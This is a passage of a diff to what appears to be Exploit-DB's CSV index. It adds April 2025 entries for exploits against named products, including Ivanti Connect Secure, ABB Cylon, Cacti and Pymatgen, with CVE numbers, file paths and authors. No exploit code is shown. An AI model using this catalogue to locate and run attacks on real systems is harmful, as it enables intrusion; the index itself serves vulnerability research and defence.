Forgery",2025-04-11,LiquidWorm,hardware,multiple,,2025-04-11,2025-04-11,0,,,,,, 52179,exploits/multiple/hardware/52179.txt,"ABB Cylon FLXeon 9.3.4 - Default Credentials",2025-04-11,LiquidWorm,hardware,multiple,,2025-04-11,2025-04-11,0,,,,,, 52188,exploits/multiple/hardware/52188.txt,"ABB Cylon FLXeon 9.3.4 - Remote Code Execution (Authenticated)",2025-04-11,LiquidWorm,hardware,multiple,,2025-04-11,2025-04-11,0,CVE-2024-48841,,,,, @@ -11060,6 +11068,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 21603,exploits/multiple/remote/21603.txt,"iPlanet Web Server 4.1 - Search Component File Disclosure",2002-07-09,"Qualys Corporation",remote,multiple,,2002-07-09,2012-09-29,1,CVE-2002-1042;OSVDB-846,,,,,https://www.securityfocus.com/bid/5191/info 29439,exploits/multiple/remote/29439.txt,"iPlanet Web Server 4.1 - Search Module Cross-Site Scripting",2007-01-09,Khalsa,remote,multiple,,2007-01-09,2013-11-04,1,CVE-2007-0183;OSVDB-32662,,,,,https://www.securityfocus.com/bid/21977/info 19749,exploits/multiple/remote/19749.txt,"ISC BIND 4.9.7/8.x - Traffic Amplification and NS Route Discovery",2000-02-14,Sebastian,remote,multiple,,2000-02-14,2012-07-16,1,,,,,,https://www.securityfocus.com/bid/983/info +52213,exploits/multiple/remote/52213.py,"Ivanti Connect Secure 22.7R2.5 - Remote Code Execution (RCE)",2025-04-15,"Abdualhadi khalifa",remote,multiple,,2025-04-15,2025-04-15,0,CVE-2025-0282,,,,, 50833,exploits/multiple/remote/50833.txt,"Ivanti Endpoint Manager 4.6 - Remote Code Execution (RCE)",2022-03-22,d7x,remote,multiple,,2022-03-22,2022-03-23,0,CVE-2021-44529,,,,, 20601,exploits/multiple/remote/20601.txt,"iweb hyperseek 2000 - Directory Traversal",2001-01-28,"MC GaN",remote,multiple,,2001-01-28,2012-08-17,1,CVE-2001-0253;OSVDB-498,,,,,https://www.securityfocus.com/bid/2314/info 4567,exploits/multiple/remote/4567.pl,"Jakarta Slide 2.1 RC1 - Remote File Disclosure",2007-10-24,kingcope,remote,multiple,,2007-10-23,2016-10-25,1,OSVDB-38673;CVE-2007-5731,,,,http://www.exploit-db.comjakarta-slide-server-bin-2.1.zip, @@ -11673,6 +11682,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 33760,exploits/multiple/webapps/33760.txt,"(Multiple Products) - 'banner.swf' Cross-Site Scripting",2010-03-15,MustLive,webapps,multiple,,2010-03-15,2014-06-15,1,,,,,,https://www.securityfocus.com/bid/38732/info 52115,exploits/multiple/webapps/52115.NA,"ABB Cylon Aspect 3.07.02 - File Disclosure",2025-04-03,LiquidWorm,webapps,multiple,,2025-04-03,2025-04-13,0,CVE-na,,,,, 52107,exploits/multiple/webapps/52107.NA,"ABB Cylon Aspect 3.08.01 - Remote Code Execution (RCE)",2025-04-02,LiquidWorm,webapps,multiple,,2025-04-02,2025-04-13,0,CVE-2024-6298,,,,, +52222,exploits/multiple/webapps/52222.txt,"ABB Cylon Aspect 3.08.03 (MapServicesHandler) - Authenticated Reflected XSS",2025-04-15,LiquidWorm,webapps,multiple,,2025-04-15,2025-04-15,0,,,,,, +52223,exploits/multiple/webapps/52223.txt,"ABB Cylon Aspect 3.08.03 - Hard-coded Secrets",2025-04-15,LiquidWorm,webapps,multiple,,2025-04-15,2025-04-15,0,,,,,, 43378,exploits/multiple/webapps/43378.py,"Ability Mail Server 3.3.2 - Cross-Site Scripting",2017-12-20,"Aloyce J. Makalanga",webapps,multiple,,2017-12-20,2017-12-20,0,CVE-2017-17752,,,,http://www.exploit-db.comams3.exe, 49298,exploits/multiple/webapps/49298.txt,"Academy-LMS 4.3 - Stored XSS",2020-12-21,"Vinicius Alves",webapps,multiple,,2020-12-21,2022-06-03,0,,,,,, 49991,exploits/multiple/webapps/49991.txt,"Accela Civic Platform 21.1 - 'contactSeqNumber' Insecure Direct Object References (IDOR)",2021-06-14,"Abdulazeez Alaseeri",webapps,multiple,,2021-06-14,2021-06-14,0,CVE-2021-34369,,,,, @@ -11680,6 +11691,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 49990,exploits/multiple/webapps/49990.txt,"Accela Civic Platform 21.1 - 'successURL' Cross-Site-Scripting (XSS)",2021-06-14,"Abdulazeez Alaseeri",webapps,multiple,,2021-06-14,2021-06-14,0,CVE-2021-34370,,,,, 49113,exploits/multiple/webapps/49113.py,"Acronis Cyber Backup 12.5 Build 16341 - Unauthenticated SSRF",2020-11-27,"Julien Ahrens",webapps,multiple,,2020-11-27,2020-11-27,0,CVE-2020-16171,,,,, 51221,exploits/multiple/webapps/51221.txt,"Active eCommerce CMS 6.5.0 - Stored Cross-Site Scripting (XSS)",2023-04-03,"Sajibe Kanti",webapps,multiple,,2023-04-03,2023-04-03,0,,,,,, +52208,exploits/multiple/webapps/52208.py,"Adapt Authoring Tool 0.11.3 - Remote Command Execution (RCE)",2025-04-15,"Eui Chul Chung",webapps,multiple,,2025-04-15,2025-04-15,0,CVE-2024-50672,,,,, 45979,exploits/multiple/webapps/45979.txt,"Adobe ColdFusion 2018 - Arbitrary File Upload",2018-12-11,"Vahagn Vardanyan",webapps,multiple,,2018-12-11,2018-12-11,0,CVE-2018-15961,,,,, 40346,exploits/multiple/webapps/40346.py,"Adobe ColdFusion < 11 Update 10 - XML External Entity Injection",2016-09-07,"Dawid Golunski",webapps,multiple,,2016-09-07,2016-09-07,1,CVE-2016-4264,,,,,http://legalhackers.com/advisories/Adobe-ColdFusion-11-XXE-Exploit-CVE-2016-4264.txt 51875,exploits/multiple/webapps/51875.py,"Adobe ColdFusion versions 2018_15 (and earlier) and 2021_5 and earlier - Arbitrary File Read",2024-03-11,"Youssef Muhammad",webapps,multiple,,2024-03-11,2024-03-11,0,,,,,, @@ -12005,6 +12017,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 32908,exploits/multiple/webapps/32908.txt,"IBM Tivoli Continuous Data Protection for Files 3.1.4.0 - Cross-Site Scripting",2009-04-14,"Abdul-Aziz Hariri",webapps,multiple,,2009-04-14,2014-04-16,1,CVE-2009-1334;OSVDB-53651,,,,,https://www.securityfocus.com/bid/34513/info 32576,exploits/multiple/webapps/32576.txt,"IBM Tivoli Netcool Service Quality Manager - Cross-Site Scripting / HTML Injection",2008-11-10,"Francesco Bianchino",webapps,multiple,,2008-11-10,2014-03-29,1,,,,,,https://www.securityfocus.com/bid/32233/info 17404,exploits/multiple/webapps/17404.txt,"IBM Websphere Application Server 7.0.0.13 - Cross-Site Request Forgery",2011-06-15,"Core Security",webapps,multiple,,2011-06-15,2011-06-15,1,CVE-2010-3271;OSVDB-73052,,,,,http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=publication&name=Finding_bugs_and_publishing_advisories +52210,exploits/multiple/webapps/52210.txt,"IBMi Navigator 7.5 - HTTP Security Token Bypass",2025-04-15,hyp3rlinx,webapps,multiple,,2025-04-15,2025-04-15,0,CVE-2024-51464,,,,, +52212,exploits/multiple/webapps/52212.txt,"IBMi Navigator 7.5 - Server Side Request Forgery (SSRF)",2025-04-15,hyp3rlinx,webapps,multiple,,2025-04-15,2025-04-15,0,CVE-2024-51463,,,,, 52009,exploits/multiple/webapps/52009.txt,"iboss Secure Web Gateway - Stored Cross-Site Scripting (XSS)",2024-05-08,modrnProph3t,webapps,multiple,,2024-05-08,2024-05-08,0,,,,,, 49148,exploits/multiple/webapps/49148.txt,"ILIAS Learning Management System 4.3 - SSRF",2020-12-02,Dot,webapps,multiple,,2020-12-02,2020-12-02,0,,,,,, 10630,exploits/multiple/webapps/10630.txt,"ImageVue 2.0 - Remote Admin Login",2009-12-24,Sora,webapps,multiple,,2009-12-23,,1,,,,,, @@ -12253,6 +12267,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 35623,exploits/multiple/webapps/35623.txt,"Pimcore CMS 2.3.0/3.0 - SQL Injection",2014-12-27,Vulnerability-Lab,webapps,multiple,,2014-12-27,2014-12-27,0,OSVDB-116460,,,,, 52193,exploits/multiple/webapps/52193.py,"Pimcore customer-data-framework 4.2.0 - SQL injection",2025-04-14,maeitsec,webapps,multiple,,2025-04-14,2025-04-14,0,CVE-2024-11956,,,,, 49519,exploits/multiple/webapps/49519.html,"Pixelimity 1.0 - 'password' Cross-Site Request Forgery",2021-02-03,Noth,webapps,multiple,,2021-02-03,2021-02-03,0,CVE-2020-23522,,,,, +52211,exploits/multiple/webapps/52211.txt,"Plane 0.23.1 - Server side request forgery (SSRF)",2025-04-15,"Saud Alenazi",webapps,multiple,,2025-04-15,2025-04-15,0,,,,,, 50426,exploits/multiple/webapps/50426.txt,"Plastic SCM 10.0.16.5622 - WebAdmin Server Access",2021-10-18,"Basavaraj Banakar",webapps,multiple,,2021-10-18,2021-10-18,0,CVE-2021-41382,,,,, 34136,exploits/multiple/webapps/34136.txt,"Plesk Server Administrator (PSA) - 'locale' Local File Inclusion",2010-06-21,"Pouya Daneshmand",webapps,multiple,,2010-06-21,2014-07-22,1,,,,,,https://www.securityfocus.com/bid/40813/info 31983,exploits/multiple/webapps/31983.txt,"Plex Media Server 0.9.9.2.374-aa23a69 - Multiple Vulnerabilities",2014-02-28,"SEC Consult",webapps,multiple,32400,2014-02-28,2014-02-28,0,OSVDB-103861;OSVDB-103841;OSVDB-103840;OSVDB-103839;CVE-2014-9304;CVE-2014-9181,,,,, @@ -13028,6 +13043,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 49807,exploits/php/dos/49807.py,"WordPress Plugin WPGraphQL 1.3.5 - Denial of Service",2021-04-27,"Dolev Farhi",dos,php,,2021-04-27,2021-10-29,0,,,,,, 1345,exploits/php/dos/1345.php,"Xaraya 1.0.0 RC4 - 'create()' Denial of Service",2005-11-29,rgod,dos,php,,2005-11-28,2016-06-13,1,OSVDB-21249;CVE-2005-3929,,,,http://www.exploit-db.comxaraya-1.0-core.zip, 44336,exploits/php/dos/44336.py,"XenForo 2 - CSS Loader Denial of Service",2018-03-23,LockedByte,dos,php,,2018-03-23,2018-03-23,0,,"Denial of Service (DoS)",,,, +52218,exploits/php/hardware/52218.txt,"ABB Cylon Aspect 3.08.02 (escDevicesUpdate.php) - Denial of Service (DOS)",2025-04-15,LiquidWorm,hardware,php,,2025-04-15,2025-04-15,0,CVE-2024-48844,,,,, +52219,exploits/php/hardware/52219.txt,"ABB Cylon Aspect 3.08.02 (webServerUpdate.php) - Input Validation Config Poisoning",2025-04-15,LiquidWorm,hardware,php,,2025-04-15,2025-04-15,0,,,,,, 13768,exploits/php/local/13768.py,"Castripper 2.50.70 - '.pls' File Stack Buffer Overflow (DEP Bypass)",2010-06-08,mr_me,local,php,,2010-06-07,2017-07-19,1,,,,http://www.exploit-db.com/screenshots/idlt14000/screen-shot-2011-01-07-at-113530-pm.png,http://www.exploit-db.comCastRipper.exe, 28504,exploits/php/local/28504.php,"PHP 3 < 5 - Ini_Restore() 'Safe_mode' / 'open_basedir' Restriction Bypass",2006-09-09,"Maksymilian Arciemowicz",local,php,,2006-09-09,2016-12-02,1,CVE-2006-4625;OSVDB-29603,,,,http://www.exploit-db.comphp-4.4.4.tar.gz,https://www.securityfocus.com/bid/19933/info 21347,exploits/php/local/21347.php,"PHP 3.0.x/4.x - Move_Uploaded_File open_basedir Circumvention",2002-03-17,Tozz,local,php,,2002-03-17,2016-12-02,1,CVE-2002-0484;OSVDB-5282,,,,http://www.exploit-db.comphp-4.1.2.tar.gz,https://www.securityfocus.com/bid/4325/info @@ -15462,6 +15479,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 33374,exploits/php/webapps/33374.txt,"Cacti 0.8.x - 'graph.php' Multiple Cross-Site Scripting Vulnerabilities",2009-11-21,"Moritz Naumann",webapps,php,,2009-11-21,2014-05-16,1,CVE-2009-4032;OSVDB-60566,,,,http://www.exploit-db.comcacti-0.8.7e.zip,https://www.securityfocus.com/bid/37109/info 49810,exploits/php/webapps/49810.py,"Cacti 1.2.12 - 'filter' SQL Injection",2021-04-29,"Leonardo Paiva",webapps,php,,2021-04-29,2021-10-29,0,CVE-2020-14295,,,,, 51740,exploits/php/webapps/51740.txt,"Cacti 1.2.24 - Authenticated command injection when using SNMP options",2023-10-09,"Antonio Francesco Sardella",webapps,php,,2023-10-09,2023-10-09,0,CVE-2023-39362,,,,, +52225,exploits/php/webapps/52225.txt,"Cacti 1.2.26 - Remote Code Execution (RCE) (Authenticated)",2025-04-15,D3Ext,webapps,php,,2025-04-15,2025-04-15,0,CVE-2024-25641,,,,, 48128,exploits/php/webapps/48128.py,"Cacti 1.2.8 - Remote Code Execution",2020-02-24,Askar,webapps,php,,2020-02-24,2020-02-24,0,,,,,, 33809,exploits/php/webapps/33809.txt,"Cacti Superlinks Plugin 1.4-2 - SQL Injection",2014-06-18,Napsterakos,webapps,php,,2014-06-18,2014-06-21,1,CVE-2014-4644;OSVDB-108452,,,http://www.exploit-db.com/screenshots/idlt34000/screen-shot-2014-06-21-at-102309.png,http://www.exploit-db.comsuperlinks-v1.4-2.tgz, 35578,exploits/php/webapps/35578.sh,"Cacti Superlinks Plugin 1.4-2 - SQL Injection / Local File Inclusion",2014-12-19,Wireghoul,webapps,php,,2014-12-19,2016-10-24,0,CVE-2014-4644;OSVDB-108452,,,,http://www.exploit-db.comsuperlinks-v1.4-2.tgz, @@ -25363,6 +25381,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 51995,exploits/php/webapps/51995.md,"OpenClinic GA 5.247.01 - Path Traversal (Authenticated)",2024-04-15,VB,webapps,php,,2024-04-15,2024-04-15,0,CVE-2023-40279,,,,, 44391,exploits/php/webapps/44391.html,"OpenCMS 10.5.3 - Cross-Site Request Forgery",2018-04-02,"Sureshbabu Narvaneni",webapps,php,,2018-04-02,2018-04-02,0,CVE-2018-8811,,,,, 44392,exploits/php/webapps/44392.txt,"OpenCMS 10.5.3 - Cross-Site Scripting",2018-04-02,"Sureshbabu Narvaneni",webapps,php,,2018-04-02,2018-04-02,0,CVE-2018-8815,,,,, +52209,exploits/php/webapps/52209.txt,"OpenCMS 17.0 - Stored Cross Site Scripting (XSS)",2025-04-15,"Siddhartha Naik",webapps,php,,2025-04-15,2025-04-15,0,CVE-2024-41947,,,,, 12396,exploits/php/webapps/12396.txt,"OpenCominterne 1.01 - Local File Inclusion",2010-04-26,cr4wl3r,webapps,php,,2010-04-25,,1,OSVDB-64211;CVE-2010-1936,,,,http://www.exploit-db.comopenmairie_cominterne_1.01.zip, 18820,exploits/php/webapps/18820.php,"OpenConf 4.11 - '/author/edit.php' Blind SQL Injection",2012-05-02,EgiX,webapps,php,,2012-05-02,2012-05-02,1,CVE-2012-1002;OSVDB-78996,,,http://www.exploit-db.com/screenshots/idlt19000/screen-shot-2012-05-02-at-100834-am.png,http://www.exploit-db.comopenconf-4.11.zip, 20347,exploits/php/webapps/20347.txt,"Openconstructor CMS 3.12.0 - 'id' Multiple SQL Injections",2012-08-08,"Lorenzo Cantoni",webapps,php,,2012-08-08,2012-08-08,0,CVE-2012-3873;OSVDB-85131,,,,http://www.exploit-db.comopenconstructor-3.12.0.zip, @@ -29009,6 +29028,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 43239,exploits/php/webapps/43239.txt,"Realestate Crowdfunding Script 2.7.2 - 'pid' SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php,,2017-12-08,2017-12-13,1,CVE-2017-17591,"SQL Injection (SQLi)",,,, 9313,exploits/php/webapps/9313.txt,"Really Simple CMS 0.3a - 'PT' Local File Inclusion",2009-07-30,SirGod,webapps,php,,2009-07-29,2016-11-14,1,OSVDB-57153;CVE-2009-2792,,,,http://www.exploit-db.comRSCMS.zip, 3641,exploits/php/webapps/3641.txt,"Really Simple PHP and Ajax (RSPA) 2007-03-23 - Remote File Inclusion",2007-04-02,"Hamid Ebadi",webapps,php,,2007-04-01,,1,OSVDB-34656;CVE-2007-1982;OSVDB-34655;CVE-2007-1851;OSVDB-34654;OSVDB-34653,,,,,http://www.bugtraq.ir/articles/advisory/RSPA_File_Inclusion/6 +52207,exploits/php/webapps/52207.py,"Really Simple Security 9.1.1.1 - Authentication Bypass",2025-04-15,"Antonio Francesco Sardella",webapps,php,,2025-04-15,2025-04-15,0,CVE-2024-10924,,,,, 5766,exploits/php/webapps/5766.txt,"realm CMS 2.3 - Multiple Vulnerabilities",2008-06-09,BugReport.IR,webapps,php,,2008-06-08,,1,OSVDB-46056;CVE-2008-2682;OSVDB-46055;CVE-2008-2681;OSVDB-46054;CVE-2008-2680;OSVDB-46053;CVE-2008-2679,,,,,http://bugreport.ir/index.php?/40 17206,exploits/php/webapps/17206.txt,"Realmarketing CMS - Multiple SQL Injections",2011-04-22,^Xecuti0N3r,webapps,php,,2011-04-22,2011-04-22,1,,,,,, 7743,exploits/php/webapps/7743.txt,"Realtor 747 - 'define.php?INC_DIR' Remote File Inclusion",2009-01-12,ahmadbady,webapps,php,,2009-01-11,,1,OSVDB-51315;CVE-2009-0495,,,,, @@ -35083,6 +35103,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 41942,exploits/python/remote/41942.rb,"Mercurial - Custom hg-ssh Wrapper Remote Code Exec (Metasploit)",2017-04-27,Metasploit,remote,python,22,2017-04-27,2017-04-27,1,,"Metasploit Framework (MSF)",,,,https://github.com/rapid7/metasploit-framework/blob/bbee7f86b5c1bd8b2e245b98fce1cb858b327948/modules/exploits/linux/ssh/mercurial_ssh_exec.rb 51051,exploits/python/remote/51051.txt,"NVFLARE < 2.1.4 - Unsafe Deserialization due to Pickle",2023-03-25,"Elias Hohl",remote,python,,2023-03-25,2023-03-25,0,CVE-2022-34668,,,,, 46645,exploits/python/remote/46645.py,"PhreeBooks ERP 5.2.3 - Remote Command Execution (1)",2019-04-03,"Metin Yunus Kandemir",remote,python,80,2019-04-03,2021-02-05,0,,,,,http://www.exploit-db.comRelease5.2.3BizunoLib3.1.7.tar.gz, +52205,exploits/python/remote/52205.py,"Pymatgen 2024.1 - Remote Code Execution (RCE)",2025-04-15,"Mohammed Idrees Banyamer",remote,python,,2025-04-15,2025-04-15,0,CVE-2024-23346,,,,, 50918,exploits/python/remote/50918.txt,"PyScript - Read Remote Python Source Code",2022-05-11,"Momen Eldawakhly",remote,python,,2022-05-11,2022-05-11,0,CVE-2022-30286,,,,, 50983,exploits/python/remote/50983.py,"rpc.py 0.6.0 - Remote Code Execution (RCE)",2022-07-29,"Elias Hohl",remote,python,,2022-07-29,2022-07-29,0,CVE-2022-35411,,,,, 42251,exploits/python/remote/42251.rb,"Symantec Messaging Gateway 10.6.2-7 - Remote Code Execution (Metasploit)",2017-06-26,"Mehmet Ince",remote,python,443,2017-06-26,2017-06-26,1,CVE-2017-6326,"Metasploit Framework (MSF)",,,,